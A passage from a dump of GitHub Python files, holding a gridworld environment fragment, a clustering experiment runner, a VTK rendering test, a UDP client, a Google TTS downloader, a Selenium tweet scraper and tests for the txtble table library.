np.exp(self.w_pc)/np.sum(np.exp(self.w_pc))\n\t\tp_gr = np.exp(self.w_gr)/np.sum(np.exp(self.w_gr))\n\t\tp_gc = np.exp(self.w_gc)/np.sum(np.exp(self.w_gc))\n\t\treturn [p_r,p_c,p_gr,p_gc]\n\n\tdef encode(self, agentrow, agentcol, goalrow, goalcol):\n\t\t# (5) 5, 5, 5\n\t\ti = agentrow\n\t\ti *= 5\n\t\ti += agentcol\n\t\ti *= 5\n\t\ti += goalrow\n\t\ti *= 5\n\t\ti += goalcol\n\t\treturn i\n\n\tdef decode(self, i):\n\t\tout = []\n\t\tout.append(i % 5)\n\t\ti = i // 5\n\t\tout.append(i % 5)\n\t\ti = i // 5\n\t\tout.append(i % 5)\n\t\ti = i // 5\n\t\tout.append(i)\n\t\tassert 0 <= i < 5\n\t\treturn reversed(out)\n\n\tdef render(self, mode='human'):\n\t\toutfile = StringIO() if mode == 'ansi' else sys.stdout\n\n\t\tout = self.desc.copy().tolist()\n\t\tout = [[c for c in line] for line in out]\n\t\tagentrow, agentcol, goalrow, goalcol = self.decode(self.s)\n\t\tdef ul(x): return \"_\" if x == \" \" else x\n\t\tout[1+agentrow][2*agentcol+1] = utils.colorize(' ', 'yellow', bold=True, highlight=True)\n\t\tout[1+goalrow][2*goalcol+1] = utils.colorize('G', 'blue', bold=True, highlight=True)\n\n\t\tif (agentrow, agentcol) == (goalrow, goalcol):\n\t\t\tout[1+agentrow][2*agentcol+1] = utils.colorize('G', 'yellow', bold=True, highlight=True)\n\n\t\toutfile.write(\"\\n\".join([\"\".join(row) for row in out])+\"\\n\")\n\t\tif self.lastaction is not None:\n\t\t\toutfile.write(\" ({})\\n\".format([\"UP\", \"DOWN\", \"LEFT\", \"RIGHT\"][self.lastaction]))\n\t\telse: outfile.write(\"\\n\")\n\n\t\t# No need to return anything for human\n\t\tif mode != 'human':\n\t\t\treturn outfile\n","repo_name":"nondecidibile/cmdp","sub_path":"gym/envs/toy_text/gridworld.py","file_name":"gridworld.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31894395880","text":"import os,argparse\nfrom Tuned_Param import *\n\n###################################################################\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"dataset\", \n help=\"dataset.\",\n type=str,\n )\nparser.add_argument(\"init\", \n help=\"Initialization\",\n choices=['rand','pre'], \n default='rand', \n type=str, \n )\n\nparser.add_argument(\"-b\",\"--batch\", \n help=\"Batch size\",\n default=256,\n type=int,\n )\n\nparser.add_argument(\"-e\",\"--epoch\", \n help=\"Number of epochs\",\n default=150,\n type=int,\n )\n\nparser.add_argument(\"-r\",\"--runs\", \n help=\"Number of runs\",\n default=20,\n type=int,\n )\n\nparser.add_argument(\"-g\",\"--gpu\", \n help=\"Which GPU to use\",\n default=\"\",\n type=str,\n )\n\nparser.add_argument(\"--draft\", \n help=\"Is it a test? 
so we don't save.'\",\n action=\"store_true\",\n )\n \nargs = parser.parse_args()\n\n\n###################################################################\n\n# Set this before loading the module\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nos.environ[\"CUDA_VISIBLE_DEVICES\"]= args.gpu\n\nfrom Module.module_CM import CM\nfrom Module.utils import *\n\n############################################################################\n\nNAME = args.dataset.upper()\nINIT = args.init.lower()\nSAVE = ~args.draft\n\nLOAD = np.load('data/'+NAME+'.npz',allow_pickle=True)\nDATA = LOAD['x'].astype('float32')\nTRUE = LOAD['y']\ndel LOAD\n\nN,D = DATA.shape\nK = int( TRUE.max()+1 )\nALPHA = CM_UNIF[NAME]['CC']\nBATCH = int(CM_UNIF[NAME]['BATCH'])\n\nif SAVE:\n FNAME = NAME+'/save/save-cm-'+ INIT + '.npz'\n \n if not os.path.exists(NAME+'/'):\n os.mkdir(NAME+'/')\n if not os.path.exists(NAME+'/save/'):\n os.mkdir(NAME+'/save/')\n print(\"*** I will save in \",FNAME)\n if os.path.exists(FNAME):\n print('Already done.')\n sys.exit()\n raise ValueError\n\nLLK = []\nLBL = []\nARI,NMI,ACC = [],[],[]\nEPC = []\n\nfor r in range(args.runs):\n print( \"\\n>>> \"+NAME+\": CM+\"+INIT+\" RUN=\",r+1)\n MODEL = CM( \n input_dim=D, \n n_clusters=K, \n true_labels=TRUE, \n )\n \n if INIT == 'pre':\n MODEL.pre_fit( \n x=DATA, \n y=TRUE,\n verbose=True,\n )\n\n epc = MODEL.fit( \n x=DATA,\n y=TRUE,\n alpha=ALPHA,\n batch_size=BATCH, \n epoch_size=args.epoch, \n optimizer_name='adam|3',\n print_interval=0, \n verbose=True,\n )\n \n LLK.append( MODEL.loss(DATA,0) )\n \n LBL.append( MODEL.predict(DATA) )\n ARI.append( ari( TRUE, LBL[-1] ) )\n NMI.append( nmi( TRUE, LBL[-1] ) )\n ACC.append( acc( TRUE, LBL[-1] ) )\n \n EPC.append( epc )\n \n del MODEL\n \n print( 'ARI: {:.5} NMI: {:.5} ACC: {:.5} EPC: {:.5}'.format(\n np.mean(ARI), \n np.mean(NMI), \n np.mean(ACC), \n np.mean(EPC)\n )\n )\n \n if SAVE:\n np.savez(FNAME,\n llk=LLK,\n lbl=LBL,\n ari=ARI,nmi=NMI,acc=ACC,\n epc=EPC\n )\n","repo_name":"Ahcene-B/clustering-Module","sub_path":"CM.py","file_name":"CM.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"9033118749","text":"#!/usr/bin/env python\nimport vtk\nfrom vtk.test import Testing\nfrom vtk.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\ndef GetRGBColor(colorName):\n '''\n Return the red, green and blue components for a\n color as doubles.\n '''\n rgb = [0.0, 0.0, 0.0] # black\n vtk.vtkNamedColors().GetColorRGB(colorName, rgb)\n return rgb\n\nVTK_VARY_RADIUS_BY_VECTOR = 2\n\n# create pipeline\n#\nreader = vtk.vtkDataSetReader()\nreader.SetFileName(VTK_DATA_ROOT + \"/Data/RectGrid2.vtk\")\nreader.Update()\n\ntoRectilinearGrid = vtk.vtkCastToConcrete()\ntoRectilinearGrid.SetInputConnection(reader.GetOutputPort())\ntoRectilinearGrid.Update()\nplane = vtk.vtkRectilinearGridGeometryFilter()\nplane.SetInputData(toRectilinearGrid.GetRectilinearGridOutput())\nplane.SetExtent(0, 100, 0, 100, 15, 15)\nwarper = vtk.vtkWarpVector()\nwarper.SetInputConnection(plane.GetOutputPort())\nwarper.SetScaleFactor(0.05)\nplaneMapper = vtk.vtkDataSetMapper()\nplaneMapper.SetInputConnection(warper.GetOutputPort())\nplaneMapper.SetScalarRange(0.197813, 0.710419)\nplaneActor = vtk.vtkActor()\nplaneActor.SetMapper(planeMapper)\n\ncutPlane = vtk.vtkPlane()\ncutPlane.SetOrigin(reader.GetOutput().GetCenter())\ncutPlane.SetNormal(1, 0, 0)\nplaneCut = 
vtk.vtkCutter()\nplaneCut.SetInputData(toRectilinearGrid.GetRectilinearGridOutput())\nplaneCut.SetCutFunction(cutPlane)\ncutMapper = vtk.vtkDataSetMapper()\ncutMapper.SetInputConnection(planeCut.GetOutputPort())\ncutMapper.SetScalarRange(\n reader.GetOutput().GetPointData().GetScalars().GetRange())\ncutActor = vtk.vtkActor()\ncutActor.SetMapper(cutMapper)\n\niso = vtk.vtkContourFilter()\niso.SetInputData(toRectilinearGrid.GetRectilinearGridOutput())\niso.SetValue(0, 0.7)\nnormals = vtk.vtkPolyDataNormals()\nnormals.SetInputConnection(iso.GetOutputPort())\nnormals.SetFeatureAngle(45)\nisoMapper = vtk.vtkPolyDataMapper()\nisoMapper.SetInputConnection(normals.GetOutputPort())\nisoMapper.ScalarVisibilityOff()\nisoActor = vtk.vtkActor()\nisoActor.SetMapper(isoMapper)\nisoActor.GetProperty().SetColor(GetRGBColor('bisque'))\nisoActor.GetProperty().SetRepresentationToWireframe()\n\nstreamer = vtk.vtkStreamTracer()\nstreamer.SetInputConnection(reader.GetOutputPort())\nstreamer.SetStartPosition(-1.2, -0.1, 1.3)\nstreamer.SetMaximumPropagation(500)\nstreamer.SetInitialIntegrationStep(0.05)\nstreamer.SetIntegrationDirectionToBoth()\n\nstreamTube = vtk.vtkTubeFilter()\nstreamTube.SetInputConnection(streamer.GetOutputPort())\nstreamTube.SetRadius(0.025)\nstreamTube.SetNumberOfSides(6)\nstreamTube.SetVaryRadius(VTK_VARY_RADIUS_BY_VECTOR)\nmapStreamTube = vtk.vtkPolyDataMapper()\nmapStreamTube.SetInputConnection(streamTube.GetOutputPort())\nmapStreamTube.SetScalarRange(\n reader.GetOutput().GetPointData().GetScalars().GetRange())\nstreamTubeActor = vtk.vtkActor()\nstreamTubeActor.SetMapper(mapStreamTube)\nstreamTubeActor.GetProperty().BackfaceCullingOn()\n\noutline = vtk.vtkOutlineFilter()\noutline.SetInputData(toRectilinearGrid.GetRectilinearGridOutput())\noutlineMapper = vtk.vtkPolyDataMapper()\noutlineMapper.SetInputConnection(outline.GetOutputPort())\noutlineActor = vtk.vtkActor()\noutlineActor.SetMapper(outlineMapper)\noutlineActor.GetProperty().SetColor(GetRGBColor('black'))\n\n# Graphics stuff\n# Create the RenderWindow, Renderer and both Actors\n#\nren1 = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.SetMultiSamples(0)\nrenWin.AddRenderer(ren1)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\n# Add the actors to the renderer, set the background and size\n#\nren1.AddActor(outlineActor)\nren1.AddActor(planeActor)\nren1.AddActor(cutActor)\nren1.AddActor(isoActor)\nren1.AddActor(streamTubeActor)\nren1.SetBackground(1, 1, 1)\n\nrenWin.SetSize(400, 400)\n\ncam1 = ren1.GetActiveCamera()\ncam1.SetClippingRange(3.76213, 10.712)\ncam1.SetFocalPoint(-0.0842503, -0.136905, 0.610234)\ncam1.SetPosition(2.53813, 2.2678, -5.22172)\ncam1.SetViewUp(-0.241047, 0.930635, 0.275343)\n\niren.Initialize()\n#iren.Start()\n","repo_name":"HopeFOAM/HopeFOAM","sub_path":"ThirdParty-0.1/ParaView-5.0.1/VTK/Filters/Geometry/Testing/Python/rectGrid.py","file_name":"rectGrid.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"72"} +{"seq_id":"5797024448","text":"import socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nprint(\"Cliente Socket criado com sucesso!!!\")\n\nhost = 'localhost'\nporta = 5433\nmensagem = \"Mensagem enviada pelo cliente\"\n\ntry:\n print(\"Cliente enviando mensagem: {}\".format(mensagem))\n s.sendto(mensagem.encode(), (host, 5432))\n print(\"Mensagem enviada com sucesso!!!\")\n\n dados, servidor = s.recvfrom(4096)\n dados = dados.decode()\n print(\"Mensagem recebida do 
servidor: {}\".format(dados))\nfinally:\n    print(\"Fechando socket...\")\n    s.close()\n","repo_name":"Manoel/Cognizant-Cloud-Data-Engineer-2","sub_path":"segurança_da_informação_com_python/scr/clienteudp.py","file_name":"clienteudp.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19267915166","text":"import collections\nimport io\nimport os\nimport sys\nimport textwrap\nimport urllib2\nfrom codecs import open as uopen\nfrom cookielib import CookieJar\nfrom shutil import copyfileobj\nfrom tempfile import mkstemp\nfrom urllib import pathname2url\n\n\n__all__ = ['TextToSpeech', 'TextToSpeechError']\n\n\nclass TextToSpeechError(Exception):\n    pass\n\n\nclass TextToSpeech(object):\n    substitutions = ( # list of substitutions\n        (u'ё', u'йо'),\n        (u'трех', u'трьох'),\n        (u'хабрахабр', u'хабрах+абр'),\n    )\n    headers = (\n        ('Host', 'translate.google.com'),\n        ('User-Agent', ('Mozilla/5.0 (Windows; U; Windows NT 6.1;'\n                        ' en-US; rv:2.0.0) Gecko/20110320 Firefox/4.0.0')),\n        ('Accept', 'text/html,application/xhtml+xml,'\n                   'application/xml;q=0.9,*/*;q=0.8'),\n        ('Accept-Language', 'en-us,en;q=0.5'),\n        ('Accept-Encoding', 'gzip,deflate'),\n        ('Accept-Charset', 'utf-8;q=0.7,*;q=0.7'),\n    )\n\n    def __init__(self, *inputs, **kwargs):\n        self.language = kwargs.get('language', 'ru')\n        if isinstance(kwargs.get('substitutions'), collections.Iterable):\n            self.substitutions = kwargs['substitutions']\n        buf = ''.join(\n            stream.read() if isinstance(stream, file) else str(stream)\n            for stream in inputs\n        )\n\n        self.buffer = self.split(buf.decode('utf-8'))\n        self.opener = self.make_opener()\n        self.files = []\n\n    def make_opener(self):\n        handler = urllib2.HTTPCookieProcessor(CookieJar())\n        opener = urllib2.build_opener(handler)\n        opener.addheaders = self.headers\n        return opener\n\n    def urls(self):\n        \"\"\"Generates url to Google Translate MP3 file.\"\"\"\n        tpl = u'http://translate.google.com/translate_tts?q=[{0}]&tl={1}'\n        for line in self.buffer:\n            yield tpl.format(pathname2url(line.encode('utf-8')), self.language)\n\n    def split(self, buf, length=95):\n        \"\"\"Splits files by sentences with maximum length=length.\"\"\"\n        for fr, to in self.substitutions:\n            buf = buf.replace(fr, to)\n        return textwrap.wrap(buf, length, break_long_words=True)\n\n    def download_voices(self):\n        \"\"\"Downloads MP3s.\"\"\"\n        for url in self.urls():\n            # print url\n            fd, path = mkstemp('.mp3')\n            fd = os.fdopen(fd, 'wb+')\n            try:\n                page = self.opener.open(url)\n            except urllib2.HTTPError:\n                raise TextToSpeechError('Google blocked your computer. 
'\n                                        'To unblock it, follow this link: {0}'.format(url))\n            copyfileobj(page, fd)\n            fd.seek(0)\n            self.files.append((path, fd))\n\n    def delete_voices(self):\n        \"\"\"Deletes all downloaded files.\"\"\"\n        while self.files:\n            path = self.files.pop()[0]\n            os.unlink(path)\n\n    def join_voices(self, to):\n        \"\"\"Copies audiodata from all downloaded MP3s to result_file.\"\"\"\n        first = True\n        if not isinstance(to, file):\n            to = open(to, 'wb')\n        while self.files:\n            path, fd = self.files.pop(0)\n            if not first: # MP3 header\n                fd.seek(32, 1)\n            copyfileobj(fd, to)\n            os.unlink(path)\n            first = False\n        return to\n\n    def create(self, result):\n        \"\"\"Downloads all voices and copies them to result_file.\"\"\"\n        self.download_voices()\n        return self.join_voices(result)\n","repo_name":"mosquito/TelePY","sub_path":"asterfiles/gTTS/gtexttospeech.py","file_name":"gtexttospeech.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"38740238564","text":"\r\nfrom selenium import webdriver\r\nimport time,codecs\r\n\r\n# Insert twitter profile in url\r\nurl='https://twitter.com/SHAQ'\r\n\r\n#open the browser and visit the url\r\ndriver = webdriver.Chrome('./chromedriver')\r\ndriver.get(url)\r\ntime.sleep(5)\r\n\r\nalready_seen=set()#keeps track of tweets we have already seen.\r\n\r\n#write the tweets to a file\r\nfw=codecs.open('tweets.txt','w',encoding='utf8')\r\n\r\nfor i in range(3):\r\n\r\n    print(i)\r\n    #find all elements that have the value \"tweet\" for the data-testid attribute\r\n    tweets=driver.find_elements_by_css_selector('div[data-testid=\"tweet\"]')#\r\n    print(len(tweets))\r\n    for tweet in tweets:\r\n\r\n        \r\n        \r\n        if tweet in already_seen:continue#we have seen this tweet before while scrolling down, ignore\r\n        already_seen.add(tweet)#first time we see this tweet. 
Mark as seen and process. \r\n        \r\n        txt,comments,retweets,tweetDate,likes='NA','NA','NA','NA','NA'\r\n        \r\n        # Fetching Tweet Text\r\n        try: \r\n            txt=tweet.find_element_by_css_selector(\"div.css-901oao.r-1qd0xha.r-16dba41.r-ad9z0x.r-bcqeeo.r-bnwqim.r-qvutc0\").text\r\n            txt=txt.replace('\\n', ' ')\r\n            print(txt)\r\n        except: print ('no text') \r\n        \r\n        # Fetching Tweet Comments\r\n        try:\r\n            #find the div element that has the value \"comments\" for the data-testid attribute\r\n            commentElement=tweet.find_element_by_css_selector('div[data-testid=\"reply\"]')\r\n            \r\n            #find the span element that has all the specified values (space separated) in its class attribute\r\n            comments=commentElement.find_element_by_css_selector('span.css-901oao.css-16my406.r-1qd0xha.r-ad9z0x.r-bcqeeo.r-qvutc0').text \r\n            print (comments) \r\n        except:\r\n            print ('no comments') \r\n        \r\n        # Fetching Tweet Retweets\r\n        try:\r\n            \r\n            #find the div element that has the value \"retweet\" for the data-testid attribute\r\n            retweetElement=tweet.find_element_by_css_selector('div[data-testid=\"retweet\"]')\r\n            \r\n            #find the span element that has all the specified values (space separated) in its class attribute\r\n            retweets=retweetElement.find_element_by_css_selector('span.css-901oao.css-16my406.r-1qd0xha.r-ad9z0x.r-bcqeeo.r-qvutc0').text \r\n            print (retweets) \r\n        except:\r\n            print ('no retweets')\r\n        \r\n        # Fetching Tweet Likes\r\n        try:\r\n            \r\n            #find the div element that has the value \"likes\" for the data-testid attribute\r\n            likeElement=tweet.find_element_by_css_selector('div[data-testid=\"like\"]')\r\n            \r\n            #find the span element that has all the specified values (space separated) in its class attribute\r\n            likes=likeElement.find_element_by_css_selector('span.css-901oao.css-16my406.r-1qd0xha.r-ad9z0x.r-bcqeeo.r-qvutc0').text \r\n            print (likes) \r\n        except:\r\n            print ('no likes') \r\n        \r\n        # Fetching Tweet Date\r\n        try:\r\n            tweetDate=tweet.find_element_by_css_selector('time').text \r\n            print (tweetDate) \r\n        except:\r\n            print ('no date')\r\n        \r\n        \r\n\r\n        #only write tweets that have text or retweets (or both). 
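Each kept tweet becomes one tab-separated line in tweets.txt (an added note; the count fields hold whatever text the page renders, e.g. \"1.2K\"):\r\n        # format: text\\tcomments\\tretweets\\tlikes\\tdate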
\r\n if txt!='NA' or retweets!='NA':\r\n fw.write(txt.replace('\\n',' ')+'\\t'+str(comments)+'\\t'+str(retweets)+'\\t'+str(likes)+'\\t'+str(tweetDate)+'\\n')\r\n print()\r\n print()\r\n\r\n \r\n #scroll down twice to load more tweets,you can also choose to scroll down multiple times\r\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\r\n time.sleep(2)\r\n\r\nfw.close()\r\n\r\n","repo_name":"vbhuvana7/Twitter-Web-scraping","sub_path":"Twitter.py","file_name":"Twitter.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24360386447","text":"from __future__ import annotations\nimport pytest\nfrom test_data import DATA, HEADERS\nfrom txtble import IndeterminateWidthError, Txtble\n\nLONG_STRING = \"Lorem ipsum dolor sit amet, consectetur adipisicing elit\"\n\n\ndef test_wrap() -> None:\n tbl = Txtble([[LONG_STRING, LONG_STRING]], widths=[20, 30])\n assert str(tbl) == (\n \"+--------------------+------------------------------+\\n\"\n \"|Lorem ipsum dolor |Lorem ipsum dolor sit amet, |\\n\"\n \"|sit amet, |consectetur adipisicing elit |\\n\"\n \"|consectetur | |\\n\"\n \"|adipisicing elit | |\\n\"\n \"+--------------------+------------------------------+\"\n )\n\n\n@pytest.mark.parametrize(\"widths\", [[20], [20, None], [20, None, 30]])\ndef test_wrap_no_wrap(widths: list[int | None]) -> None:\n tbl = Txtble([[LONG_STRING, LONG_STRING]], widths=widths)\n assert str(tbl) == (\n \"+--------------------+--------------------------------------------------------+\\n\"\n \"|Lorem ipsum dolor |Lorem ipsum dolor sit amet, consectetur adipisicing elit|\\n\"\n \"|sit amet, | |\\n\"\n \"|consectetur | |\\n\"\n \"|adipisicing elit | |\\n\"\n \"+--------------------+--------------------------------------------------------+\"\n )\n\n\ndef test_no_wrap_wrap() -> None:\n tbl = Txtble([[LONG_STRING, LONG_STRING]], widths=[None, 30])\n assert str(tbl) == (\n \"+--------------------------------------------------------+------------------------------+\\n\"\n \"|Lorem ipsum dolor sit amet, consectetur adipisicing elit|Lorem ipsum dolor sit amet, |\\n\"\n \"| |consectetur adipisicing elit |\\n\"\n \"+--------------------------------------------------------+------------------------------+\"\n )\n\n\ndef test_wrap_long_word() -> None:\n tbl = Txtble(\n [[LONG_STRING], [\"antidisestablishmentarianism\"]],\n row_border=True,\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\\n\"\n \"|antidisestablishment|\\n\"\n \"|arianism |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_colored_long_word() -> None:\n tbl = Txtble(\n [[LONG_STRING], [\"\\033[31mantidisestablishmentarianism\\033[m\"]],\n row_border=True,\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\\n\"\n \"|\\033[31mantidisestablishment\\033[m|\\n\"\n \"|\\033[31marianism\\033[m |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_long_word_no_break_long_words() -> None:\n tbl = Txtble(\n [[LONG_STRING], [\"antidisestablishmentarianism\"]],\n break_long_words=False,\n row_border=True,\n widths=[20],\n )\n assert str(tbl) == (\n \"+----------------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n 
\"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+----------------------------+\\n\"\n \"|antidisestablishmentarianism|\\n\"\n \"+----------------------------+\"\n )\n\n\n@pytest.mark.parametrize(\"break_long\", [True, False])\ndef test_wrap_long_hyphenated_word(break_long: bool) -> None:\n tbl = Txtble(\n [[LONG_STRING], [\"anti-dis-establish-ment-ari-an-ism\"]],\n break_long_words=break_long,\n row_border=True,\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\\n\"\n \"|anti-dis-establish- |\\n\"\n \"|ment-ari-an-ism |\\n\"\n \"+--------------------+\"\n )\n\n\n@pytest.mark.parametrize(\"break_long\", [True, False])\ndef test_wrap_long_multi_hyphenated_word(break_long: bool) -> None:\n ### XXX: textwrap.wrap would insert a break before the '---'; should txtble\n ### do likewise?\n tbl = Txtble(\n [[LONG_STRING], [\"anti-dis-establish---ment-ari-an-ism\"]],\n break_long_words=break_long,\n row_border=True,\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\\n\"\n \"|anti-dis-establish--|\\n\"\n \"|-ment-ari-an-ism |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_long_hyphenated_word_no_break_on_hyphens() -> None:\n tbl = Txtble(\n [[LONG_STRING], [\"anti-dis-establish-ment-ari-an-ism\"]],\n break_on_hyphens=False,\n row_border=True,\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\\n\"\n \"|anti-dis-establish-m|\\n\"\n \"|ent-ari-an-ism |\\n\"\n \"+--------------------+\"\n )\n\n\n@pytest.mark.parametrize(\"hyph_break\", [True, False])\ndef test_wrap_long_soft_hyphenated_word(hyph_break: bool) -> None:\n # textwrap doesn't break on soft hyphens, so txtble shouldn't either.\n tbl = Txtble(\n [\n [LONG_STRING],\n [\"anti\\xADdis\\xADestablish\\xADment\\xADari\\xADan\\xADism\"],\n ],\n break_on_hyphens=hyph_break,\n row_border=True,\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\\n\"\n \"|anti\\xADdis\\xADestablish\\xADm|\\n\"\n \"|ent\\xADari\\xADan\\xADism |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_some_cells() -> None:\n tbl = Txtble(\n [[LONG_STRING], [\"antidisestablishmentarianism\"]],\n row_border=True,\n widths=[30],\n )\n assert str(tbl) == (\n \"+------------------------------+\\n\"\n \"|Lorem ipsum dolor sit amet, |\\n\"\n \"|consectetur adipisicing elit |\\n\"\n \"+------------------------------+\\n\"\n \"|antidisestablishmentarianism |\\n\"\n \"+------------------------------+\"\n )\n\n\ndef test_wrap_shorter_than_width() -> None:\n tbl = Txtble(DATA, headers=HEADERS, widths=20)\n assert str(tbl) == (\n \"+--------------------+--------------------+--------------------+\\n\"\n \"|Month |Birthstone |Birth Flower |\\n\"\n \"+--------------------+--------------------+--------------------+\\n\"\n \"|January |Garnet |Carnation |\\n\"\n \"|February |Amethyst |Violet |\\n\"\n \"|March |Aquamarine |Jonquil |\\n\"\n \"|April |Diamond |Sweetpea |\\n\"\n \"|May |Emerald |Lily Of The Valley |\\n\"\n \"|June |Pearl |Rose |\\n\"\n \"|July |Ruby 
|Larkspur |\\n\"\n \"|August |Peridot |Gladiolus |\\n\"\n \"|September |Sapphire |Aster |\\n\"\n \"|October |Opal |Calendula |\\n\"\n \"|November |Topaz |Chrysanthemum |\\n\"\n \"|December |Turquoise |Narcissus |\\n\"\n \"+--------------------+--------------------+--------------------+\"\n )\n\n\ndef test_wrap_color() -> None:\n tbl = Txtble(\n [\n [\n \"\\033[31mLorem\\033[m\"\n \" \\033[32mipsum\\033[m\"\n \" \\033[33mdolor\\033[m\"\n \" \\033[34msit\\033[m \\033[35mamet\\033[m,\"\n \" \\033[36mconsectetur\\033[m\"\n \" \\033[41madipisicing\\033[m\"\n \" \\033[42melit\\033[m\"\n ]\n ],\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|\\033[31mLorem\\033[m \\033[32mipsum\\033[m \\033[33mdolor\\033[m |\\n\"\n \"|\\033[34msit\\033[m \\033[35mamet\\033[m, |\\n\"\n \"|\\033[36mconsectetur\\033[m |\\n\"\n \"|\\033[41madipisicing\\033[m \\033[42melit\\033[m |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_running_color() -> None:\n tbl = Txtble(\n [\n [\n \"\\033[31mLorem\"\n \" \\033[32mipsum\"\n \" \\033[33mdolor\"\n \" \\033[34msit \\033[35mamet,\"\n \" \\033[36mconsectetur\"\n \" \\033[41madipisicing\"\n \" \\033[42melit\\033[m\"\n ]\n ],\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|\\033[31mLorem \\033[32mipsum \\033[33mdolor\\033[m |\\n\"\n \"|\\033[31m\\033[32m\\033[33m\\033[34msit \\033[35mamet,\\033[m |\\n\"\n \"|\\033[31m\\033[32m\\033[33m\\033[34m\\033[35m\\033[36mconsectetur\\033[m |\\n\"\n \"|\\033[31m\\033[32m\\033[33m\\033[34m\\033[35m\\033[36m\\033[41madipisicing \\033[42melit\\033[m |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_long_color() -> None:\n tbl = Txtble([[\"\\033[31m\" + LONG_STRING + \"\\033[0m\"]], widths=[20])\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|\\033[31mLorem ipsum dolor\\033[m |\\n\"\n \"|\\033[31msit amet,\\033[m |\\n\"\n \"|\\033[31mconsectetur\\033[m |\\n\"\n \"|\\033[31madipisicing elit\\033[0m |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_width_fill() -> None:\n tbl = Txtble([[LONG_STRING, LONG_STRING]], widths=[20], width_fill=30)\n assert str(tbl) == (\n \"+--------------------+------------------------------+\\n\"\n \"|Lorem ipsum dolor |Lorem ipsum dolor sit amet, |\\n\"\n \"|sit amet, |consectetur adipisicing elit |\\n\"\n \"|consectetur | |\\n\"\n \"|adipisicing elit | |\\n\"\n \"+--------------------+------------------------------+\"\n )\n\n\ndef test_width_fill_all() -> None:\n tbl = Txtble([[LONG_STRING, LONG_STRING]], width_fill=20)\n assert str(tbl) == (\n \"+--------------------+--------------------+\\n\"\n \"|Lorem ipsum dolor |Lorem ipsum dolor |\\n\"\n \"|sit amet, |sit amet, |\\n\"\n \"|consectetur |consectetur |\\n\"\n \"|adipisicing elit |adipisicing elit |\\n\"\n \"+--------------------+--------------------+\"\n )\n\n\n@pytest.mark.parametrize(\"width_fill\", [None, 30])\ndef test_widths_all(width_fill: int | None) -> None:\n tbl = Txtble([[LONG_STRING, LONG_STRING]], widths=20, width_fill=width_fill)\n assert str(tbl) == (\n \"+--------------------+--------------------+\\n\"\n \"|Lorem ipsum dolor |Lorem ipsum dolor |\\n\"\n \"|sit amet, |sit amet, |\\n\"\n \"|consectetur |consectetur |\\n\"\n \"|adipisicing elit |adipisicing elit |\\n\"\n \"+--------------------+--------------------+\"\n )\n\n\n@pytest.mark.parametrize(\"width_fill\", [None, 30])\ndef test_widths_all_none(width_fill: int | None) -> None:\n tbl = Txtble(\n [[LONG_STRING, LONG_STRING]],\n width_fill=width_fill,\n widths=None,\n )\n assert str(tbl) == (\n 
